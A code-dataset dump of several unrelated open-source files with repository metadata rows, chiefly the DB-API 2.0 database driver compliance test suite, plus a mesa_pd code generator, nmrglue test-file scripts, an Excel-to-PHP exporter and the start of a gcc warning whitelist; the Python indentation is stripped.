# Some drivers may need to override these helpers, for example adding
# a 'commit' after the execute.
def executeDDL1(self,cursor):
cursor.execute(self.ddl1)
def executeDDL2(self,cursor):
cursor.execute(self.ddl2)
def setUp(self):
''' self.drivers should override this method to perform required setup
if any is necessary, such as creating the database.
'''
pass
def tearDown(self):
''' self.drivers should override this method to perform required cleanup
if any is necessary, such as deleting the test database.
The default drops the tables that may be created.
'''
con = self._connect()
try:
cur = con.cursor()
for ddl in (self.xddl1,self.xddl2):
try:
cur.execute(ddl)
con.commit()
except self.driver.Error:
# Assume table didn't exist. Other tests will check if
# execute is busted.
pass
finally:
con.close()
def _connect(self):
try:
return self.driver.connect(
*self.connect_args,**self.connect_kw_args
)
except AttributeError:
self.fail("No connect method found in self.driver module")
def test_connect(self):
con = self._connect()
con.close()
def test_apilevel(self):
try:
# Must exist
apilevel = self.driver.apilevel
# Must equal 2.0
self.assertEqual(apilevel,'2.0')
except AttributeError:
self.fail("Driver doesn't define apilevel")
def test_threadsafety(self):
try:
# Must exist
threadsafety = self.driver.threadsafety
# Must be a valid value
self.failUnless(threadsafety in (0,1,2,3))
except AttributeError:
self.fail("Driver doesn't define threadsafety")
def test_paramstyle(self):
try:
# Must exist
paramstyle = self.driver.paramstyle
# Must be a valid value
self.failUnless(paramstyle in (
'qmark','numeric','named','format','pyformat'
))
except AttributeError:
self.fail("Driver doesn't define paramstyle")
def test_Exceptions(self):
# Make sure required exceptions exist, and are in the
# defined heirarchy.
self.failUnless(issubclass(self.driver.Warning,Exception))
self.failUnless(issubclass(self.driver.Error,Exception))
self.failUnless(
issubclass(self.driver.InterfaceError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.DatabaseError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.OperationalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.IntegrityError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.InternalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.ProgrammingError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.NotSupportedError,self.driver.Error)
)
def test_ExceptionsAsConnectionAttributes(self):
# OPTIONAL EXTENSION
# Test for the optional DB API 2.0 extension, where the exceptions
# are exposed as attributes on the Connection object
# I figure this optional extension will be implemented by any
# driver author who is using this test suite, so it is enabled
# by default.
con = self._connect()
drv = self.driver
self.failUnless(con.Warning is drv.Warning)
self.failUnless(con.Error is drv.Error)
self.failUnless(con.InterfaceError is drv.InterfaceError)
self.failUnless(con.DatabaseError is drv.DatabaseError)
self.failUnless(con.OperationalError is drv.OperationalError)
self.failUnless(con.IntegrityError is drv.IntegrityError)
self.failUnless(con.InternalError is drv.InternalError)
self.failUnless(con.ProgrammingError is drv.ProgrammingError)
self.failUnless(con.NotSupportedError is drv.NotSupportedError)
def test_commit(self):
con = self._connect()
try:
# Commit must work, even if it doesn't do anything
con.commit()
finally:
con.close()
def test_rollback(self):
con = self._connect()
# If rollback is defined, it should either work or throw
# the documented exception
if hasattr(con,'rollback'):
try:
con.rollback()
except self.driver.NotSupportedError:
pass
def test_cursor(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
def test_cursor_isolation(self):
con = self._connect()
try:
# Make sure cursors created from the same connection have
# the documented transaction isolation level
cur1 = con.cursor()
cur2 = con.cursor()
self.executeDDL1(cur1)
cur1.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
cur2.execute("select name from %sbooze" % self.table_prefix)
booze = cur2.fetchall()
self.assertEqual(len(booze),1)
self.assertEqual(len(booze[0]),1)
self.assertEqual(booze[0][0],'Victoria Bitter')
finally:
con.close()
def test_description(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.description,None,
'cursor.description should be none after executing a '
'statement that can return no rows (such as DDL)'
)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(len(cur.description),1,
'cursor.description describes too many columns'
)
self.assertEqual(len(cur.description[0]),7,
'cursor.description[x] tuples must have 7 elements'
)
self.assertEqual(cur.description[0][0].lower(),'name',
'cursor.description[x][0] must return column name'
)
self.assertEqual(cur.description[0][1],self.driver.STRING,
'cursor.description[x][1] must return column type. Got %r'
% cur.description[0][1]
)
# Make sure self.description gets reset
self.executeDDL2(cur)
self.assertEqual(cur.description,None,
'cursor.description not being set to None when executing '
'no-result statements (eg. DDL)'
)
finally:
con.close()
def test_rowcount(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount should be -1 after executing no-result '
'statements'
)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1),
'cursor.rowcount should == number or rows inserted, or '
'set to -1 after executing an insert statement'
)
cur.execute("select name from %sbooze" % self.table_prefix)
self.failUnless(cur.rowcount in (-1,1),
'cursor.rowcount should == number of rows returned, or '
'set to -1 after executing a select statement'
)
self.executeDDL2(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount not being reset to -1 after executing '
'no-result statements'
)
finally:
con.close()
lower_func = 'lower'
def test_callproc(self):
con = self._connect()
try:
cur = con.cursor()
if self.lower_func and hasattr(cur,'callproc'):
r = cur.callproc(self.lower_func,('FOO',))
self.assertEqual(len(r),1)
self.assertEqual(r[0],'FOO')
r = cur.fetchall()
self.assertEqual(len(r),1,'callproc produced no result set')
self.assertEqual(len(r[0]),1,
'callproc produced invalid result set'
)
self.assertEqual(r[0][0],'foo',
'callproc produced invalid results'
)
finally:
con.close()
def test_close(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
# cursor.execute should raise an Error if called after connection
# closed
self.assertRaises(self.driver.Error,self.executeDDL1,cur)
# connection.commit should raise an Error if called after connection'
# closed.'
self.assertRaises(self.driver.Error,con.commit)
# connection.close should raise an Error if called more than once
self.assertRaises(self.driver.Error,con.close)
def test_execute(self):
con = self._connect()
try:
cur = con.cursor()
self._paraminsert(cur)
finally:
con.close()
def _paraminsert(self,cur):
self.executeDDL1(cur)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1))
if self.driver.paramstyle == 'qmark':
cur.execute(
'insert into %sbooze values (?)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'numeric':
cur.execute(
'insert into %sbooze values (:1)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'named':
cur.execute(
'insert into %sbooze values (:beer)' % self.table_prefix,
{'beer':"Cooper's"}
)
elif self.driver.paramstyle == 'format':
cur.execute(
'insert into %sbooze values (%%s)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'pyformat':
cur.execute(
'insert into %sbooze values (%%(beer)s)' % self.table_prefix,
{'beer':"Cooper's"}
)
else:
self.fail('Invalid paramstyle')
self.failUnless(cur.rowcount in (-1,1))
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,'cursor.fetchall returned too few rows')
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Cooper's",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
self.assertEqual(beers[1],"Victoria Bitter",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
def test_executemany(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
largs = [ ("Cooper's",) , ("Boag's",) ]
margs = [ {'beer': "Cooper's"}, {'beer': "Boag's"} ]
if self.driver.paramstyle == 'qmark':
cur.executemany(
'insert into %sbooze values (?)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'numeric':
cur.executemany(
'insert into %sbooze values (:1)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'named':
cur.executemany(
'insert into %sbooze values (:beer)' % self.table_prefix,
margs
)
elif self.driver.paramstyle == 'format':
cur.executemany(
'insert into %sbooze values (%%s)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'pyformat':
cur.executemany(
'insert into %sbooze values (%%(beer)s)' % (
self.table_prefix
),
margs
)
else:
self.fail('Unknown paramstyle')
self.failUnless(cur.rowcount in (-1,2),
'insert using cursor.executemany set cursor.rowcount to '
'incorrect value %r' % cur.rowcount
)
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,
'cursor.fetchall retrieved incorrect number of rows'
)
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Boag's",'incorrect data retrieved')
self.assertEqual(beers[1],"Cooper's",'incorrect data retrieved')
finally:
con.close()
def test_fetchone(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchone should raise an Error if called before
# executing a select-type query
self.assertRaises(self.driver.Error,cur.fetchone)
# cursor.fetchone should raise an Error if called after
# executing a query that cannnot return rows
self.executeDDL1(cur)
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if a query retrieves '
'no rows'
)
self.failUnless(cur.rowcount in (-1,0))
# cursor.fetchone should raise an Error if called after
# executing a query that cannnot return rows
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchone()
self.assertEqual(len(r),1,
'cursor.fetchone should have retrieved a single row'
)
self.assertEqual(r[0],'Victoria Bitter',
'cursor.fetchone retrieved incorrect data'
)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if no more rows available'
)
self.failUnless(cur.rowcount in (-1,1))
finally:
con.close()
samples = [
'Carlton Cold',
'Carlton Draft',
'Mountain Goat',
'Redback',
'Victoria Bitter',
'XXXX'
]
def _populate(self):
''' Return a list of sql commands to setup the DB for the fetch
tests.
'''
populate = [
"insert into %sbooze values ('%s')" % (self.table_prefix,s)
for s in self.samples
]
return populate
def test_fetchmany(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchmany should raise an Error if called without
#issuing a query
self.assertRaises(self.driver.Error,cur.fetchmany,4)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany()
self.assertEqual(len(r),1,
'cursor.fetchmany retrieved incorrect number of rows, '
'default of arraysize is one.'
)
cur.arraysize=10
r = cur.fetchmany(3) # Should get 3 rows
self.assertEqual(len(r),3,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should get 2 more
self.assertEqual(len(r),2,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should be an empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence after '
'results are exhausted'
)
self.failUnless(cur.rowcount in (-1,6))
# Same as above, using cursor.arraysize
cur.arraysize=4
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany() # Should get 4 rows
self.assertEqual(len(r),4,
'cursor.arraysize not being honoured by fetchmany'
)
r = cur.fetchmany() # Should get 2 more
self.assertEqual(len(r),2)
r = cur.fetchmany() # Should be an empty sequence
self.assertEqual(len(r),0)
self.failUnless(cur.rowcount in (-1,6))
cur.arraysize=6
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchmany() # Should get all rows
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows),6)
self.assertEqual(len(rows),6)
rows = [r[0] for r in rows]
rows.sort()
# Make sure we get the right data back out
for i in range(0,6):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved by cursor.fetchmany'
)
rows = cur.fetchmany() # Should return an empty list
self.assertEqual(len(rows),0,
'cursor.fetchmany should return an empty sequence if '
'called after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,6))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
r = cur.fetchmany() # Should get empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence if '
'query retrieved no rows'
)
self.failUnless(cur.rowcount in (-1,0))
finally:
con.close()
def test_fetchall(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchall should raise an Error if called
# without executing a query that may return rows (such
# as a select)
self.assertRaises(self.driver.Error, cur.fetchall)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
# cursor.fetchall should raise an Error if called
# after executing a a statement that cannot return rows
self.assertRaises(self.driver.Error,cur.fetchall)
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.assertEqual(len(rows),len(self.samples),
'cursor.fetchall did not retrieve all rows'
)
rows = [r[0] for r in rows]
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'cursor.fetchall retrieved incorrect rows'
)
rows = cur.fetchall()
self.assertEqual(
len(rows),0,
'cursor.fetchall should return an empty list if called '
'after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,0))
self.assertEqual(len(rows),0,
'cursor.fetchall should return an empty list if '
'a select query returns no rows'
)
finally:
con.close()
def test_mixedfetch(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
rows1 = cur.fetchone()
rows23 = cur.fetchmany(2)
rows4 = cur.fetchone()
rows56 = cur.fetchall()
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows23),2,
'fetchmany returned incorrect number of rows'
)
self.assertEqual(len(rows56),2,
'fetchall returned incorrect number of rows'
)
rows = [rows1[0]]
rows.extend([rows23[0][0],rows23[1][0]])
rows.append(rows4[0])
rows.extend([rows56[0][0],rows56[1][0]])
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved or inserted'
)
finally:
con.close()
def help_nextset_setUp(self,cur):
''' Should create a procedure called deleteme
that returns two result sets, first the
number of rows in booze then "name from booze"
'''
raise NotImplementedError('Helper not implemented')
#sql="""
# create procedure deleteme as
# begin
# select count(*) from booze
# select name from booze
# end
#"""
#cur.execute(sql)
def help_nextset_tearDown(self,cur):
'If cleaning up is needed after nextSetTest'
raise NotImplementedError('Helper not implemented')
#cur.execute("drop procedure deleteme")
def test_nextset(self):
con = self._connect()
try:
cur = con.cursor()
if not hasattr(cur,'nextset'):
return
try:
self.executeDDL1(cur)
sql=self._populate()
for sql in self._populate():
cur.execute(sql)
self.help_nextset_setUp(cur)
cur.callproc('deleteme')
numberofrows=cur.fetchone()
assert numberofrows[0]== len(self.samples)
assert cur.nextset()
names=cur.fetchall()
assert len(names) == len(self.samples)
s=cur.nextset()
assert s == None,'No more return sets, should return None'
finally:
self.help_nextset_tearDown(cur)
finally:
con.close()
def test_nextset(self):
raise NotImplementedError('Drivers need to override this test')
def test_arraysize(self):
# Not much here - rest of the tests for this are in test_fetchmany
con = self._connect()
try:
cur = con.cursor()
self.failUnless(hasattr(cur,'arraysize'),
'cursor.arraysize must be defined'
)
finally:
con.close()
def test_setinputsizes(self):
con = self._connect()
try:
cur = con.cursor()
cur.setinputsizes( (25,) )
self._paraminsert(cur) # Make sure cursor still works
finally:
con.close()
def test_setoutputsize_basic(self):
# Basic test is to make sure setoutputsize doesn't blow up
con = self._connect()
try:
cur = con.cursor()
cur.setoutputsize(1000)
cur.setoutputsize(2000,0)
self._paraminsert(cur) # Make sure the cursor still works
finally:
con.close()
def test_setoutputsize(self):
# Real test for setoutputsize is driver dependant
raise NotImplementedError('Driver need to override this test')
def test_None(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
cur.execute('insert into %sbooze values (NULL)' % self.table_prefix)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchall()
self.assertEqual(len(r),1)
self.assertEqual(len(r[0]),1)
self.assertEqual(r[0][0],None,'NULL value not returned as None')
finally:
con.close()
def test_Date(self):
d1 = self.driver.Date(2002,12,25)
d2 = self.driver.DateFromTicks(time.mktime((2002,12,25,0,0,0,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(d1),str(d2))
def test_Time(self):
t1 = self.driver.Time(13,45,30)
t2 = self.driver.TimeFromTicks(time.mktime((2001,1,1,13,45,30,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(t1),str(t2))
def test_Timestamp(self):
t1 = self.driver.Timestamp(2002,12,25,13,45,30)
t2 = self.driver.TimestampFromTicks(
time.mktime((2002,12,25,13,45,30,0,0,0))
)
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(t1),str(t2))
def test_Binary(self):
b = self.driver.Binary('Something')
b = self.driver.Binary('')
def test_STRING(self):
self.failUnless(hasattr(self.driver,'STRING'),
'module.STRING must be defined'
)
def test_BINARY(self):
self.failUnless(hasattr(self.driver,'BINARY'),
'module.BINARY must be defined.'
)
def test_NUMBER(self):
self.failUnless(hasattr(self.driver,'NUMBER'),
'module.NUMBER must be defined.'
)
def test_DATETIME(self):
self.failUnless(hasattr(self.driver,'DATETIME'),
'module.DATETIME must be defined.'
)
def test_ROWID(self):
self.failUnless(hasattr(self.driver,'ROWID'),
'module.ROWID must be defined.'
)
|
d33tah/bpgsql
|
tests/dbapi20.py
|
Python
|
lgpl-2.1
| 31,413 | 0.010251 |
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).
from . import test_ui
|
Vauxoo/e-commerce
|
website_sale_require_legal/tests/__init__.py
|
Python
|
agpl-3.0
| 88 | 0 |
from survey.management.commands.import_location import Command
__all__ = ['']
|
antsmc2/mics
|
survey/management/commands/__init__.py
|
Python
|
bsd-3-clause
| 77 | 0.012987 |
# -*- coding: utf-8 -*-
from mesa_pd.accessor import create_access
from mesa_pd.utility import generate_file
def create_property(name, type, defValue=""):
"""
Parameters
----------
name : str
name of the property
type : str
type of the property
defValue : str
default value the property should be initialized with
"""
return {'name': name, 'type': type, 'defValue': defValue}
class HCSITSRelaxationStep():
def __init__(self):
self.context = {'properties': [], 'interface': []}
self.context['properties'].append(create_property("maxSubIterations", "size_t", defValue="20"))
self.context['properties'].append(
create_property("relaxationModel", "RelaxationModel", defValue="InelasticFrictionlessContact"))
self.context['properties'].append(create_property("deltaMax", "real_t", defValue="0"))
self.context['properties'].append(create_property("cor", "real_t", defValue="real_t(0.2)"))
self.context['interface'].append(create_access("uid", "walberla::id_t", access="g"))
self.context['interface'].append(create_access("position", "walberla::mesa_pd::Vec3", access="g"))
self.context['interface'].append(create_access("linearVelocity", "walberla::mesa_pd::Vec3", access="g"))
self.context['interface'].append(create_access("angularVelocity", "walberla::mesa_pd::Vec3", access="g"))
self.context['interface'].append(create_access("invMass", "walberla::real_t", access="g"))
self.context['interface'].append(create_access("invInertia", "walberla::mesa_pd::Mat3", access="g"))
self.context['interface'].append(create_access("dv", "walberla::mesa_pd::Vec3", access="gr"))
self.context['interface'].append(create_access("dw", "walberla::mesa_pd::Vec3", access="gr"))
def generate(self, module):
ctx = {'module': module, **self.context}
generate_file(module['module_path'], 'kernel/HCSITSRelaxationStep.templ.h', ctx)
|
lssfau/walberla
|
python/mesa_pd/kernel/HCSITSRelaxationStep.py
|
Python
|
gpl-3.0
| 2,010 | 0.006468 |
#! /usr/bin/env python
""" Create files for shuf unit test """
import nmrglue.fileio.pipe as pipe
import nmrglue.process.pipe_proc as p
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="ri2c")
pipe.write("shuf1.glue", d, a, overwrite=True)
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="c2ri")
pipe.write("shuf2.glue", d, a, overwrite=True)
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="ri2rr")
pipe.write("shuf3.glue", d, a, overwrite=True)
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="exlr")
pipe.write("shuf4.glue", d, a, overwrite=True)
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="rolr")
pipe.write("shuf5.glue", d, a, overwrite=True)
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="swap")
pipe.write("shuf6.glue", d, a, overwrite=True)
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="inv")
pipe.write("shuf7.glue", d, a, overwrite=True)
|
atomman/nmrglue
|
tests/pipe_proc_tests/shuf.py
|
Python
|
bsd-3-clause
| 963 | 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import os
from core.base_processor import xBaseProcessor
from utilities.export_helper import xExportHelper
from utilities.file_utility import xFileUtility
from definitions.constant_data import xConstantData
class xProcessorPhp(xBaseProcessor) :
def __init__(self, p_strSuffix, p_strConfig) :
return super(xProcessorPhp, self).__init__('PHP', p_strSuffix, p_strConfig)
def ProcessExport(self, p_strWorkbookName, p_cWorkbook, p_cWorkSheet, p_mapExportConfigs, p_mapDatabaseConfigs, p_mapIndexSheetConfigs, p_mapDataSheetConfigs, p_mapPreloadDataMaps, p_nCategoryLevel) :
print('>>>>> 正在处理 工作表 [{0}] => [{1}]'.format(p_mapIndexSheetConfigs['DATA_SHEET'], self.Type.lower()))
strExportDirectory = self.GetExportDirectory(p_mapExportConfigs)
self.PrepareExportDirectory(strExportDirectory)
lstCategoryLevelColumnIndexIndexs = self.GetCategoryLevelColumnIndexList(p_nCategoryLevel, self.Config, p_mapExportConfigs, p_mapDataSheetConfigs)
mapGenerateControl = { }
mapGenerateControl['level_index'] = 0
mapGenerateControl['ident'] = '\t'
strContent = ''
strContent += '<?php\n'
strContent += '\n'
strContent += '// ////////////////////////////////////////////////////////////////////////////////////////////\n'
strContent += '// \n'
strContent += '// {0}\n'.format(self.GetCopyrightString(p_mapExportConfigs['COPYRIGHT']['ORGANIZATION'], p_mapExportConfigs['COPYRIGHT']['SINCE_YEAR']))
strContent += '// \n'
strContent += '// Create By : {0}\n'.format(self.GetAuthorString())
strContent += '// \n'
strContent += '// Description : {0}\n'.format(p_cWorkSheet.title)
strContent += '// \n'
strContent += '// ////////////////////////////////////////////////////////////////////////////////////////////\n'
strContent += '\n'
strContent += 'return array('
strContent += self.__ConvertPHPContent(p_mapExportConfigs, p_mapDataSheetConfigs, p_mapPreloadDataMaps, lstCategoryLevelColumnIndexIndexs, p_nCategoryLevel, mapGenerateControl)
strContent += '\n'
strContent += ');\n'
strContent += '\n'
strContent += '// end\n'
strFileName = '{0}.{1}'.format(p_mapIndexSheetConfigs['DATA_FILE_NAME'], self.Suffix.lower())
strFilePath = os.path.join(strExportDirectory, strFileName)
xFileUtility.DeleteFile(strFilePath)
bSuccess = xFileUtility.WriteDataToFile(strFilePath, 'w', strContent)
if bSuccess :
print('>>>>> 工作表 [{0}] => [{1}] 处理成功!'.format(p_mapIndexSheetConfigs['DATA_SHEET'], self.Type.lower()))
else :
print('>>>>> 工作表 [{0}] => [{1}] 处理失败!'.format(p_mapIndexSheetConfigs['DATA_SHEET'], self.Type.lower()))
return bSuccess
def __ConvertPHPContent(self, p_mapExportConfigs, p_mapDataSheetConfigs, p_mixPreloadDatas, p_lstCategoryLevelColumnIndexIndexs, p_nCategoryLevel, p_mapGenerateControl) :
if type(p_mixPreloadDatas) == dict and p_mixPreloadDatas.has_key('datas') :
return self.__ConvertPHPContent(p_mapExportConfigs, p_mapDataSheetConfigs, p_mixPreloadDatas['datas'], p_lstCategoryLevelColumnIndexIndexs, p_nCategoryLevel, p_mapGenerateControl)
if type(p_mixPreloadDatas) == dict :
strContent = ''
p_mapGenerateControl['level_index'] += 1
for mixKey in p_mixPreloadDatas :
if mixKey is None :
continue
strContent += '\n{0}'.format(self.GenerateIdentIdentifier(p_mapGenerateControl['level_index'], p_mapGenerateControl['ident']))
strKey = '{0}'.format(mixKey)
strKey = strKey.replace('\'', '\\\\\'')
if xConstantData.MYSQL_DATA_DEFINITIONS[p_mapDataSheetConfigs[p_lstCategoryLevelColumnIndexIndexs[p_mapGenerateControl['level_index'] - 1]][xConstantData.DATA_SHEET_ROW_DATA_TYPE].upper()]['IS_STRING'] :
strContent += '\'{0}\' => array('.format(strKey)
else :
strContent += '{0} => array('.format(strKey)
strContent += self.__ConvertPHPContent(p_mapExportConfigs, p_mapDataSheetConfigs, p_mixPreloadDatas[mixKey], p_lstCategoryLevelColumnIndexIndexs, p_nCategoryLevel, p_mapGenerateControl)
if p_mapGenerateControl['level_index'] < len(p_lstCategoryLevelColumnIndexIndexs) :
strContent += '\n{0}'.format(self.GenerateIdentIdentifier(p_mapGenerateControl['level_index'], p_mapGenerateControl['ident']))
if type(p_mixPreloadDatas[mixKey]) == list and len(p_mixPreloadDatas[mixKey]) > 1 :
strContent += '\n{0}'.format(self.GenerateIdentIdentifier(p_mapGenerateControl['level_index'], p_mapGenerateControl['ident']))
strContent += '),'
p_mapGenerateControl['level_index'] -= 1
return strContent
if type(p_mixPreloadDatas) == list :
nPreloadDataSize = len(p_mixPreloadDatas)
strContent = ''
for mapLineDatas in p_mixPreloadDatas :
nDataColumnIndex = 0
if self.IsEmptyLine(mapLineDatas) :
nPreloadDataSize -= 1
continue
if nPreloadDataSize > 1 :
strContent += '\n{0}array('.format(self.GenerateIdentIdentifier(p_mapGenerateControl['level_index'] + 1, p_mapGenerateControl['ident']))
for nColumnIndex in p_mapDataSheetConfigs :
if not xExportHelper.IsDataSheetColumnLanguageAvailable(p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_LANGUAGE_CODE], self.Config, p_mapExportConfigs) :
continue
if not xExportHelper.IsDataSheetColumnExportTypeAvailable(p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_EXPORT_IDENTIFIER], self.Config, p_mapExportConfigs) :
continue
# if p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_AUTO_INCREMENT_IDENTIFIER] is not None :
# continue
strCellValue = ''
strFieldName = xExportHelper.GetFieldNameAsI18N(p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_FIELD], p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_LANGUAGE_CODE], self.Config, p_mapExportConfigs)
if mapLineDatas[strFieldName] is None :
if p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_DEFAULT_VALUE] is not None :
strCellValue = '{0}'.format(p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_DEFAULT_VALUE])
else :
if xConstantData.MYSQL_DATA_DEFINITIONS[p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_DATA_TYPE].upper()]['IS_STRING'] :
strCellValue = ''
else :
strCellValue = '0'
else :
strCellValue = '{0}'.format(mapLineDatas[strFieldName])
strCellValue = strCellValue.replace('\'', '\\\\\'')
if nDataColumnIndex > 0 :
strContent += ' '
if xConstantData.MYSQL_DATA_DEFINITIONS[p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_DATA_TYPE].upper()]['IS_STRING'] :
strContent += '\'{0}\' => \'{1}\','.format(strFieldName, strCellValue)
else :
strContent += '\'{0}\' => {1},'.format(strFieldName, strCellValue)
nDataColumnIndex += 1
if nPreloadDataSize > 1 :
strContent += '),'
return strContent
|
xLemon/xExcelConvertor
|
excel_convertor/processors/processor_php.py
|
Python
|
mit
| 7,054 | 0.026398 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Invoke gcc, looking for warnings, and causing a failure if there are
# non-whitelisted warnings.
import errno
import re
import os
import sys
import subprocess
# Note that gcc uses unicode, which may depend on the locale. TODO:
# force LANG to be set to en_US.UTF-8 to get consistent warnings.
allowed_warnings = set([
"alignment.c:327",
"inet_hashtables.h:356",
"mmu.c:602",
"return_address.c:62",
"swab.h:49",
"SemaLambda.cpp:946",
"CGObjCGNU.cpp:1414",
"BugReporter.h:146",
